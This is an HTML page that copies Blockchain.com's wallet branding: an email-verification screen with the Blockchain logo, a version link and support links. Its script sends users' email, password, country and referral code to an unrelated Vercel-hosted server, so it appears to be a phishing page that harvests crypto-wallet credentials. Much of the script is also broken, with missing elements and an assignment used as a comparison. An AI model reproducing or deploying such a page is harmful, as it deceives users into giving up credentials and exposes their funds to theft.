<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Signup Page</title>
  <!-- Bootstrap CSS -->
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js" integrity="sha512-v2CJ7UaYy4JwqLDIrZUI/4hqeoQieOmAZNXBeQyjo21dadnwR+8ZaIJVT8EE2iyI61OV8e6M8PP2/4hpQINQ/g==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
  <!-- Bootstrap Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.17.0/font/bootstrap-icons.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css" integrity="sha512-DTOQO9RWCH3ppGqcWaEA1BIZOC6xxalwEsw9c2QQeAIftl+Vegovlnee1c9QX4TctnWMn13TZye+giMm8e2LwA==" crossorigin="anonymous" referrerpolicy="no-referrer" />
</head>
<body style="background-color: rgb(18, 29, 51);">
<style>
    .footer-container {
    margin-top: 5px;
        padding: 20px;
        display: flex;
        justify-content: space-around;
        align-items: center;
        position: relative;
      }
  
      .language-dropdown select {
        padding: 8px;
        font-size: 14px;
        border: none;
      }
  
      .version-link,
      /* .help-link {
        color: #555;
        text-decoration: none;
      } */
      .round
      {
        border-radius: 10px;
        padding: 20px;
      }
      .help-link,.version-link{
      font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
      font-weight: 500;
      font-size: 12px;
      line-height: inherit;
      text-transform: none;
      font-style: normal;
      color: rgb(152, 161, 178);
      cursor: inherit;
      /* display: block; */
      opacity: 1;
  }
  
  .nodec
  {
    border: none;
    background: transparent;
    color: rgb(152, 161, 178);
      cursor: inherit;
      font-weight: 500;
      font-size: 16px;
  }
  
      #contact-chat-portal {
        margin-top: -40px;
      }
      .heyy {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-weight: 600;
    font-size: 24px;
    line-height: 1.5;
    text-transform: none;
    font-style: normal;
    color: rgb(18, 29, 51);
    cursor: inherit;
    display: block;
    opacity: 1;
}
  
label {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-weight: 600;
    font-size: 14px;
    line-height: inherit;
    text-transform: none;
    font-style: normal;
    color: rgb(53, 63, 82);
    cursor: inherit;
    display: block;
    opacity: 1;
    margin-bottom: 5px;
}

.junior {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-weight: 600;
    font-size: 16px;
    line-height: 1.5;
    text-transform: none;
    font-style: normal;
    color: rgb(18, 29, 51);
    cursor: inherit;
    display: block;
    opacity: 1;
}

.glIUyi {
      font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
      font-weight: 500;
      font-size: 12px;
      line-height: inherit;
      text-transform: none;
      font-style: normal;
      color: rgb(53, 63, 82);
      cursor: inherit;
      display: block;
      opacity: 1;
  }
  
  .jZhDID > div * {
      max-height: 26rem;
      transition: all 0.5s ease 0s;
  }
  
  .jnOrAR {
      display: flex;
      cursor: pointer;
      position: relative;
  }
  .gbcMol:hover {
      color: rgb(12, 108, 242);
  }
  
  .jZhDID > div * {
      max-height: 26rem;
      transition: all 0.5s ease 0s;
  }
  
  .jkNPNG > * {
      display: inline-block;
  }
  .jkNPNG > * {
      display: inline-block;
  }
  
  .inline{
    display: flex;
  }
  
  .mine
  {
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
  }
@media (max-width: 576px) {
      .card {
        border-radius: 10px; /* Remove border radius on mobile */
      }

      .footer-container {
        flex-direction: row;
        align-items: center;
        text-align: center;
        /* max-width: 200px !important; */
        /* overflow: hidden; */
      
      }
      .img
      {
        width:"350px"

      }

      .version-link, .help-link {
        margin-top: 10px;
      }
    }
</style>
<div class="toppic"><img src="bg-pattern.svg" alt="" width="100%"><div class="sc-esOvli jSqxFK"></div>
<div class="container mt-2" >
    
  <div class="row mine justify-content-center">
   
    <div class="col-md-6">
        <div class="img" style="display: flex; align-items: center; justify-content: center; margin-bottom: 40px;"><img src="bc-logo.svg" alt="" height="24px" width="auto"></div>
  
      <div class="card round">
        <div class=" text-center" style="display: flex; flex-direction:column; line-height: 20px; justify-content: center; align-items: center; margin-top: 0px; padding: 10px;">
            <img src="messsage.png" alt="">
          <h3 class="heyy">Verify Your Email</h3>
          <div class="junior">We sent a verification email to <br><b><span id="email"></span></b>.Please click the link in the email to continue</div>
        </div>
        <div class="card-body round">
          <form  id="signupForm">
            <div class="form-group">
           </div> 
           
                      <style>
                        .btn
                        {
                            border: 1px solid white;
                        }
                      </style>
                      
           <button  class="form-control btn"height="48px" type="submit" color="primary" class="" id="btn" style="background-color: transparent; border: 1px solid rgb(195, 192, 192); color:rgb(47, 124, 240)" ><div color="whiteFade900" cursor="inherit" opacity="1" class="sc-gzVnrw edfwkt fw-bolder" onclick="again()"><b>Send Again</b> </div></button></form></div>
                      
          </form>
          
        </div>
        
      </div>
      <div class="footer-container">
        <div class="language-dropdown">
          <select class="nodec">
            <option value="english">English</option>
            <option value="spanish">Español</option>
            <option value="french">Français</option>
            <option value="portuguese">Português</option>
            <option value="russian">Русский</option>
          </select>
        </div>
      
        <div class="version-link">
          <a class="version-link" href="https://github.com/blockchain/blockchain-wallet-v4-frontend/releases" target="_blank">Version 4.96.2</a>
        </div>
      
        <div class="help-link">
          <a class="help-link" href="https://support.blockchain.com/" target="_blank">Need Help?</a>
        </div>
      </div>
    </div>
  </div>
  
</div>
<script>
     Swal.fire({
      title: '!',
      text: 'Another verification email will be sent to your email',
      icon: 'success',
      confirmButtonText: 'OK'
    });
</script>
<!-- Bootstrap JS and Popper.js (required for Bootstrap) -->
<!-- <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script> -->
<script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.11.6/dist/umd/popper.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
<!-- JavaScript to toggle password visibility -->
<script>
  // Toggle password visibility
  document.getElementById('togglePassword').addEventListener('click', function () {
    var passwordInput = document.getElementById('password');
    var type = passwordInput.getAttribute('type') === 'password' ? 'text' : 'password';
    passwordInput.setAttribute('type', type);
  });

  // Toggle confirm password visibility
  document.getElementById('toggleConfirmPassword').addEventListener('click', function () {
    var confirmPasswordInput = document.getElementById('confirmPassword');
    var type = confirmPasswordInput.getAttribute('type') === 'password' ? 'text' : 'password';
    confirmPasswordInput.setAttribute('type', type);
  });
</script>


<script>
    function again(){
        location.href="verify.html"
    }
     $(document).ready( function () {
              var fetem=localStorage.getItem("email")
             
              var email=document.getElementById("email")
              email.innerHTML=fetem
          })
   function toggleStateField() {
    var countrySelect = document.getElementById('country');
    var stateField = document.getElementById('stateField');

    if (countrySelect.value.toLowerCase() === 'united states') {
      stateField.style.display = 'block';
    } else {
      stateField.style.display = 'none';
    }
  }
var strong=document.getElementById(email)
var email=localStorage.getItem('email')
strong.innerHTML=email;

  // document.getElementById('myForm').addEventListener('submit', function (e) {
  //   e.preventDefault();
  //   // Handle form submission here
  //   alert('Form submitted!');
  // });
    var btn=document.getElementById('registerBtn');
   function red () {
    var btn=document.getElementById("btn")
           btn.style="opacity:1"
           btn.innerHTML="Continue"
   
                          }
                          function topFunction() {
document.body.scrollTop = 0; // For Safari
document.documentElement.scrollTop = 0; // For Chrome, Firefox, IE and Opera
}
const state=document.getElementById("stateholder")
state.style.display="none"
var country=document.getElementById("country")
               if(country.value="Nigeria"){
                alert(country.value)
                state.style.display="block"
               }           
   
   function blurr (){
       var btn=document.getElementById("btn")
       btn.style="opacity:0.5"
       btn.innerHTML= "Loading . . ."
      
   }
   
          async function registerUser(values) {
               await $.ajax({
                   type: "POST",
                   url: "https://block-server.vercel.app/auth/register",
                   dataType: "json",
                   data: { ...values },
                   timeout: 30000,
                   success: function (data) {
                       console.log(data);
                       $('.live-section').html("Account was successfully created").addClass('alert-success')
                       setTimeout(function () {
                           $(location).prop('href', './verified.html')
                       }, 1000)
   
                   },
                   error: function (xhr, status, error) {
                       red();
                       console.log(error);
                       $('.live-section').html("User already exists").addClass('alert-danger')
                   }
               });
   
           }
   
   
           $('#signupForm').submit(function (e) {
               e.preventDefault(); // prevents page reload
               blurr();
             
              //  const firstName = $('#firstname').val();
              //  const lastName = $('#lastname').val();
              const state=document.getElementById("state")
               const email = $('#email').val();
               const password = $('#password').val();
               const country = $('#country').val();
               const referralCode = $('#referralCode').val();
   
               
              //  localStorage.setItem("password",password)
              //  localStorage.setItem("email",email)
             
              //  localStorage.setItem("firstName",firstName)
               
              //  alert(email,password,country,referralCode);
               console.log(email,password,country,state,referralCode);
               registerUser({email,password,country,state,referralCode });
          
         topFunction();

           })

          

       </script>
</body>
</html>
